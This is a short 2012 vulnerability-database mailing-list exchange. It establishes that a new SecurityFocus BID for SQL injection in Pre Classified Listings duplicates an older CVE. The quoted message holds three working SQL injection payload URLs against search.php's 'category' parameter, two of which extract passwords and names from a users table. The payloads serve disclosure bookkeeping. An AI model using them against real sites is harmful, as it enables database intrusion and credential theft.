[VIM] Preprojects Pre Classified Listings 'category' Parameter SQL Injection Vulnerability
Rob Keith
rkeith at securityfocus.com
Tue Mar 20 10:53:56 CDT 2012
Yes, same issue, we'll retire the new BID.
Thanks George.
-Rob
George A. Theall wrote:
> Looks like SecurityFocus created BID 52543 today for a SQL injection in Pre Classifieds. They give as a sample PoC:
>
> http://wwww.example.com/classi/search.php?category=-1+union+all+select+version()--
>
> which matches EDB-ID 18613.
>
> This looks to me like a dup of CVE-2007-2675 / OSVDB 35597 / BID 23795 / EDB-ID 3840:
>
> search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
> search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*
>
> Rob?
>
> George
--
Rob Keith
Symantec